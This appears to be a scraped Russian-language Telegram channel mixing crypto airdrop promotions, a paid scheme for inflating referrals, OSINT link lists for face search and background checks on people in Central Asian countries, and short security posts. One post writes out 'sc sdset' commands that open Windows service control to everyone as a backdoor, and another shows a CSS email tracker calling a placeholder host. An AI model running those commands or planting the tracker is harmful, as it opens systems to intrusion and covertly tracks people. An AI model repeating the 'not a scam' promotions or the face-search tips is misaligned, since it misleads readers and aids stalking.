Usman's Laboratory
1.15K subscribers
36 photos
1 video
2 files
82 links
Download Telegram
Помните, я с Major вывел 200$ без вложений? Пригласил друзей и давай лутать бонусы, каждый день, без усилий.

Это был первый сезон...

Но, Major запустили 2 сезон
⚡️⚡️⚡️⚡️⚡️⚡️

Сейчас у всех нас, вторая возможность получить 200-300$ фактически ничего не делая, и самое главное без вложений 🦾

Заходим и играем, забираем все бонусы и лутаем деньги 💵

Сразу скажу, это НЕ СКАМ.
Мажор хотят сохранить свой токен на бирже, и поэтому раздают процент. 👍 Плюс ко всему, огромное сообщество! Прямо сейчас присоединяемся. И будьте одним из первых!

➡️ Забрать бонусы, ИГРАТЬ

Не забываем реакции 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍32❤‍🔥1🆒1
Эксперты из Cisco Talos обнаружили новую схему для фишинга.

Злоумышленники встраивают в HTML особый CSS-код, который помогает скрывать вредоносный контент, организовывать слежку и обходить детекцию. Скрытие достигается за счет использования CSS-свойств. Слежка осуществляется через @media-запросы, которые фиксируют изменение размеров окна, взаимодействие с письмом и другие параметры, передавая данные на сервер.

Пример кода, реализующего такой трекер: 
<style>
  .tracker { display: none; }
  @media (max-width: 600px) {
    .tracker { display: block; background: url('http://site.com/track?user=1'); }
  }
</style>
<div class="tracker"></div>


Этот код активируется при изменении размеров окна просмотра письма, например, при его открытии на мобильном устройстве, и инициирует скрытый запрос на сервер.

На самом деле, это НЕ КРИТИЧЕСКАЯ уязвимость.
Есть много ограничений в такой реализации.
Но факт в том, что такой код НЕ заметят большинство антитрекеров
.
Антитрекеры в основном проверяют только javascript.

Где можно найти такое?
Везде где есть html, это сайты, письма, веб-приложения и т.д.

📌 Tonnel Relayer bot - продавай и покупай nft telegram подарки 🔥

Ставим реакции - едем дальше.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍5🏆2❤‍🔥11
Илон Маск официально подтвердил о запуске @GrokAI в Телеграм.

Ждём хороший рост TON ? 🪙

На данный момент доступно бесплатно, только тех у кого телеграм премиум 👍.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍42🏆1🆒1
Как залить в реф-бота или на канал минимум 200 активных рефералов или подписчиков за 3$? 📩

Существует бот, в котором я лично протестировал данный функционал и получил за минуту 30 рефералов, которые прошли проверку в реф-боте

1. Нужно иметь хотя бы 0.8 ton на кошельке.
2. Перейти в бота по моей ссылке. (ниже будет представлена)
3. Нажать на [+ создать задание].
4. Пополнить баланс на минимум 0.75 тон.
5. Вставить ссылку и запустить задание.
6. Готово, вам насыпят минимум 200 активных рефералов/подписчиков, иногда и больше.

Увидеть ссылку подробнее(купить схему):
➡️Здесь. (нажимается)
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥9👍42🏆1
Usman's Laboratory
Увидеть ссылку подробнее:
➡️Здесь. (нажимается)
UPD: После оплаты счета, у вас откроется ссылка на бота, о котором идёт речь. ✈️
Если не получается оплатить счёт, пишите в лс.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥62🏆1
Сокращения которые нужно знать.

IDS - система обнаружения атак/вторжений
IPS - система предотвращения атак/вторжений
PII - персональная идентифицируемая информация
DoS - отказ обслуживания
DDoS - распределенный отказ в обслуживании
DNS - система доменных имён
CTF - захват флага
CDN - сеть доставки контента
APT - постоянная угроза
XSS - атака, межсайтовый скриптинг
KMS - служба управления ключами доступа
SSID - сервисный идентификатор
MiTM - атака *человек посередине*
CLI - инструмент командной строки/терминал

Жду реакции 👇
🔥105👍3👏1💯1
Дуров объявил о партнёрстве Telegram и xAI и интеграции в мессенджер чат-бота Grok

ИИ-бот Grok в Telegram сможет отвечать на вопросы, редактировать сообщения, делать выжимки, модерировать чаты и проверять факты

Telegram получит $300 млн и 50% выручки от подписок xAI, оформленных через платформу

А затем Маск написал что сделки Не было. Ответ на скрине.
Правда или ложь?
Скорее правда.

На фоне этого тон немного вырос, ждём тон по 7$?
Да - 🔥
1🔥92👍21
Анализ файлов, поиск троянов/вирусов


🟢 https://opentip.kaspersky.com/
IT портал и платформа анализа Лаборатории Касперского.

https://www.virustotal.com
Обнаружение вредоносного ПО антивирусными движками.

🟢 https://tria.ge
Сервис-песочница для анализа вредоносных программ. Он позволяет пользователям бесплатно анализировать образцы вредоносных программ в настраиваемой среде.

https://www.hybrid-analysis.com
Бесплатный автоматизированный сервис анализа вредоносных программ, работающий на базе Falcon Sandbox.

Ставь реакции 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥63👍3❤‍🔥1👏1
Поиск людей, по лицу 😀

Думаю понятно, как ими пользоваться.

1️⃣ https://faceonlive.com/face-search-online

2️⃣ https://facecheck.id/

3️⃣ https://www.image-search.org/

Скину ещё, ставьте реакции 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
5🔥4👍3💯1
Тестируем
Пишите ваши сообщения
Они попадут мне, анонимно

Кнопка слева внизу 💬
У кого нет кнопки, обновите телеграм и перезапустите!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍52
Успешно затестили. Прилетело множество сообщений.

Реакции = продолжу серию статей по "Автоматизация задач"
2🔥9👍43
Файловые поисковые системы

Полезно при фактчекинге и других похожих операциях, где надо искать файлы из общего доступа.

Некоторые люди ищут сессии, но помните что сессии легко доступные, в 99% случаев трояны.

1. https://nyaa.si/
2. https://btdig.com/
3. https://bitsearch.to/
4. https://filepursuit.com/
5. https://softarchive.is/
6. https://scnlog.me/
6🔥5👍3👌1
Как посмотреть историю изменений Twitter (сейчас X) юзернейм профиля?

В браузере открываем:

https://api.memory.lol/v1/tw/{username}

Вместо {username} пишем актуальный юзернейм профиля. Без фигурных скобок.
Реакции 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥71👍1
Альтернативный поиск, по коду

https://publicwww.com/ - Поисковик альтернативного типа, ищущий не по содержимому сайта, а по его коду.
Позволяет находить связи по рекламным идентификаторам (ADINT), различные уязвимости, кликджекинг например.

Реакции 👇
🔥81👍1
Легальный и малозаметный Бэкдор в Виндовс

Разрешаем удаленное использование Services.msc

sc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)

sc.exe sdset scmanager D:(A;;KA;;;WD)

После выполнения этих команд, все смогут удалённо управлять запущенными службами.

Такую команду может выполнять вредоносное ПО!

Антивирус не поможет, надо руками устранить данную уязвимость.
Как?
Следите за правами доступа для программ и служб, которым вы не доверяете.

Реакции 👇
1👍7🔥51
Как посмотреть ID любого телеграм пользователя, канала, группы или бота?

1. Переходим в бот
@username_to_id_bot

2. Выбираем нужный чат или пересылаем сообщение.

3. Готово, нам выдаст ID который можно использовать для поиска информации.

На десктоп версии достаточно активировать в бета-настройках, показ ID всех пользователей и каналов/групп.

Реакции 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥10🏆31
Куда летим падаем...
Зовите друзей/знакомых на этот канал
Чем больше сабов, тем больше постов 🦾
Ждём всех

Reactions 👇
🔥7👍2👌21
🇰🇿 Казахстан - проверка граждан

Понадобится при проверке граждан, например перед сделками, обменом/торговлей и так далее.

Предоставленны только оф. сайты Казахстана, легально

1. Поиск налогоплательщиков, оф. сайт - http://kgd.gov.kz/ru/services/taxpayer_search

2. Проверка задолженностей - https://kgd.gov.kz/ru/app/culs-taxarrear-search-web

3. Штрафы по ИНН - https://serj.ws/pddfine

4. Телефонный справочник, устаревший, но не бесполезный - http://spravochnik109.link/kazahstan

5. Мамонт - найдёт упоминания в документах 📄- http://mmnt.ru

Сохраняем к себе и ставим реакции 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍21
🇰🇬 Кыргызстан - проверка граждан и компаний 🇰🇬

1. https://salyk.kg/TaxPayer/Info - поиск налогоплательщиков по ИНН

2. https://www.kse.kg - кыргызская фондовая биржа

3. https://salyk.kg/TaxPayer/PatentInfo - проверка патентов

4. https://portal.tunduk.kg/public_services/opisanie/7994819 - проверка задолженностей

5. Мамонт - найдёт упоминания в документах 📄- http://mmnt.ru

Сохраняем к себе и ставим реакции 👇
🔥10👍21
🇦🇲 Армения - проверка компаний/юр. лиц 🇦🇲


1. https://www.e-register.am/am/search - Электронный регистр юридических лиц Армении

2. http://www.datalex.am/?app=AppCaseSearch - База по судебным делам

3. https://old.aipa.am/ru/ Офис интеллектуальной собственности Министерства экономики Армении

4. https://amx.am/ - Армянская фондовая биржа

5. https://www.cba.am/am/SitePages/Default.aspx Центральный банк Армении

6. https://data.hetq.am/ Платформа журналистских расследований

🧑‍💻 Реакции и будут следующие страны 💙
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍32